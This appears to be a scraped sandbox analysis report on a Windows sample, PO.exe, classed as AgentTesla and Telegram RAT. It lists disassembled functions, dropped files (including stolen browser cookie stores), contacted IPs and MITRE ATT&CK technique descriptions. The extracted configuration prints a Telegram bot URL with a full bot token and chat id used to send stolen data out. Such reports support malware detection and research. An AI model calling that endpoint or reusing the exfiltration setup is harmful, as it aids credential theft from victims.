Opcode ID: 8db3b5dd2445ae8286eacf8a20e05add1128ad807106a4d7a731f6d342f2ab12
Instruction ID: 5b9f7bcc6aa2cb4531c7ae8d7558a7824e229e670c72a382ab27e7bff8c748e7
Opcode Fuzzy Hash: 8db3b5dd2445ae8286eacf8a20e05add1128ad807106a4d7a731f6d342f2ab12
Instruction Fuzzy Hash: 8EF01272E04269CFCB94DFAC95442EF7BF4EE98221B05407AD959E3204E6354A058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 0146AA98 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dad59500ab3b22a7904b1416f7596281efcd78ea8d9485bfe153faccb5014f64
Instruction ID: ceffcdc6764264ff16060b701b3a598e4e3825598a3bb5ff9c48f1d47fc36cc7
Opcode Fuzzy Hash: dad59500ab3b22a7904b1416f7596281efcd78ea8d9485bfe153faccb5014f64
Instruction Fuzzy Hash: D9E04FB2E001299F8B54EFBD98445EF7BFCEA8C261B10407AE51DE3304EA744E418BE1

Uniqueness

Uniqueness Score: -1.00%

Function 01466110 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61da813ed126f0a0b2b0f86d460506e4aacd42e65c5e5c5a701e5910f9498d72
Instruction ID: e1c867a9b5b06d5cbc9ea45077d00512f7d340ce2751c0bf1ded314c95b31dde
Opcode Fuzzy Hash: 61da813ed126f0a0b2b0f86d460506e4aacd42e65c5e5c5a701e5910f9498d72
Instruction Fuzzy Hash: C4E0D83560871487E314AB20E49413AFFF6EFC4282F1288BDE9C9415B4CE32D4B08747

Uniqueness

Uniqueness Score: -1.00%

Function 0146F7D0 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d0ab79a7c5c89abb666bbf496db4bd06a3950bec226b39f99069f913e05326d
Instruction ID: d8e4a615422503206f211f1b3e6704bbcb8d77ce4681d4cfecf953ab2831b883
Opcode Fuzzy Hash: 5d0ab79a7c5c89abb666bbf496db4bd06a3950bec226b39f99069f913e05326d
Instruction Fuzzy Hash: 0FC08C70888380CFCF47A7785894AC13FB06F43320B0601E7D0809E067E71C1986D721

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0146E1B8 Relevance: 5.3, Strings: 4, Instructions: 323COMMON

Download Yara Rule

Strings

X[l, xrefs: 0146E297
X[l, xrefs: 0146E1DE
X[l, xrefs: 0146E218
X[l, xrefs: 0146E2E4

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: X[l$X[l$X[l$X[l
API String ID: 0-4246460527
Opcode ID: 34b98ebbd141262774731342d4c5b6fba770b246d14d7d47985f689221df89ca
Instruction ID: d98ad257cfc656c28a778d92540d0877412d84afb9ea11aad81a0a85fb68e028
Opcode Fuzzy Hash: 34b98ebbd141262774731342d4c5b6fba770b246d14d7d47985f689221df89ca
Instruction Fuzzy Hash: E5D171B1A4937C8FCB80CE98C4D43BA76A3EF42328F00016ECECA55571E7758D479A99

Uniqueness

Uniqueness Score: -1.00%

Function 01460040 Relevance: 5.1, Strings: 4, Instructions: 125COMMON

Download Yara Rule

Strings

X[l, xrefs: 01460071
X[l, xrefs: 0146012B
X[l, xrefs: 01460173
X[l, xrefs: 014600A5

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: X[l$X[l$X[l$X[l
API String ID: 0-4246460527
Opcode ID: 3778b4e2ab5212d06b7aec10a623e54570a13b164373533493d5b96ff276e8d0
Instruction ID: 04c56dfd480000636b27066088d3a2bcec6892869f85a677666d0aab9293fbf0
Opcode Fuzzy Hash: 3778b4e2ab5212d06b7aec10a623e54570a13b164373533493d5b96ff276e8d0
Instruction Fuzzy Hash: B6410B71E442268BDB35862CCC507BFB7B9AB85214F0544B7EA1AD7761EB31CD818B83

Uniqueness

Uniqueness Score: -1.00%

Function 01460006 Relevance: 5.1, Strings: 4, Instructions: 116COMMON

Download Yara Rule

Strings

X[l, xrefs: 01460071
X[l, xrefs: 0146012B
X[l, xrefs: 01460173
X[l, xrefs: 014600A5

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: X[l$X[l$X[l$X[l
API String ID: 0-4246460527
Opcode ID: 889d4a3045c0fd2c432ba3ba29b44c9039b1e1e6ad850e8a2612c0822f8304b5
Instruction ID: d17057b27164ad4135c1f5bc6046d34ef5362782a318bdf1cd7c29e6d56e2cb1
Opcode Fuzzy Hash: 889d4a3045c0fd2c432ba3ba29b44c9039b1e1e6ad850e8a2612c0822f8304b5
Instruction Fuzzy Hash: F8411830A493668FDB368A288C203BB7BB56F46218F0540F7D545DB7A2E671CD818B93

Uniqueness

Uniqueness Score: -1.00%

Function 0146E195 Relevance: 5.1, Strings: 4, Instructions: 102COMMON

Download Yara Rule

Strings

X[l, xrefs: 0146E297
X[l, xrefs: 0146E1DE
X[l, xrefs: 0146E218
X[l, xrefs: 0146E2E4

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: X[l$X[l$X[l$X[l
API String ID: 0-4246460527
Opcode ID: d0cea14e6485dd0113194f8f9c87c41ef2510af0eb5c1a0185e460c71177f7d0
Instruction ID: 847dd69e29ac8d02f0ec8070826000084e48086bf1feda8d42cd58fdbede7de0
Opcode Fuzzy Hash: d0cea14e6485dd0113194f8f9c87c41ef2510af0eb5c1a0185e460c71177f7d0
Instruction Fuzzy Hash: 8D31C575D042298FDB65CB6C89513AF7BFA6F85204F1540B6C509F7361DB30CA858B93

Uniqueness

Uniqueness Score: -1.00%

Function 01461F60 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;Wl, xrefs: 01461F92
\;Wl, xrefs: 01461F6C
\;Wl, xrefs: 01461F9E
\;Wl, xrefs: 01461F76

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: \;Wl$\;Wl$\;Wl$\;Wl
API String ID: 0-1558982888
Opcode ID: 6eeef1601fad1f16138338ca25a2d836c25616ebe2e222f94bc188537275441b
Instruction ID: 9178fb19dd7e12c09c6c02e05545a8418939f75161cb504a01b45859b1faa8a3
Opcode Fuzzy Hash: 6eeef1601fad1f16138338ca25a2d836c25616ebe2e222f94bc188537275441b
Instruction Fuzzy Hash: C8017C31B041118F87288A2EC46092677EAAFE9A78715416BE505CB371EB71DC82C7A2

Uniqueness

Uniqueness Score: -1.00%

Source: CasPol.exe.7240.4.memstrmin	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "561616954", "Chat URL": "https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument"}
Source: CasPol.exe.7240.4.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendMessage"}

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_010DD808 CryptUnprotectData,		4_2_010DD808
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_010DDEF0 CryptUnprotectData,		4_2_010DDEF0

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 162.159.133.233 162.159.133.233
Source: Joe Sandbox View	IP Address: 162.159.133.233 162.159.133.233

Source: PO.exe	Virustotal: Detection: 29%			Perma Link
Source: PO.exe	ReversingLabs: Detection: 26%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Threatname: Telegram RAT

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes\Incongeniality\Ableptically\Omfattede\Iblanding\Heterodoxical.Ufo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes\Referenceliste\holdovers\open-menu-symbolic.svg

C:\Users\user\AppData\Local\Temp\TOBEN.lnk

C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll

C:\Users\user\AppData\Roaming\hw3hufbj.yur\Chrome\Default\Cookies

C:\Users\user\AppData\Roaming\hw3hufbj.yur\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
PO.exe

Function 004033B6 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 401
stringfilecomCOMMON

Function 0040541C Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Function 004061A0 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Function 0040596F Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 00406846 Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 004064C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Function 00403D6A Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 004039C7 Relevance: 49.2, APIs: 14, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402E41 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 004052DD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 004057AC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Function 004064E8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Function 00405D82 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Function 00405C3A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47
stringCOMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre